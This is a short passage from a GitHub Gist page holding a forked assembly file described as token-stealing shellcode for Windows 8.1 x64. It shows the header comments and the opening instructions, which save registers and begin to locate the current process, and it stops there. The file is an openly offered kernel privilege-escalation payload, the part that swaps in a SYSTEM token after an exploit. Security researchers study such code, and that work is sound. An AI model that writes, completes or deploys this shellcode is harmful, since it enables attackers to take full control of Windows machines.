Skip to content

Instantly share code, notes, and snippets.

@koncybernet
koncybernet / win81-token-stealing-shellcode.asm
Created December 13, 2017 05:04 — forked from hugsy/win81-token-stealing-shellcode.asm
Token stealing shellcode for Windows 8.1 x64
;;
;; Token stealing shellcode for Windows 8.1 x64
;;
;; Save the current context on the stack
push rax
push rbx
push rcx
;; Get the current process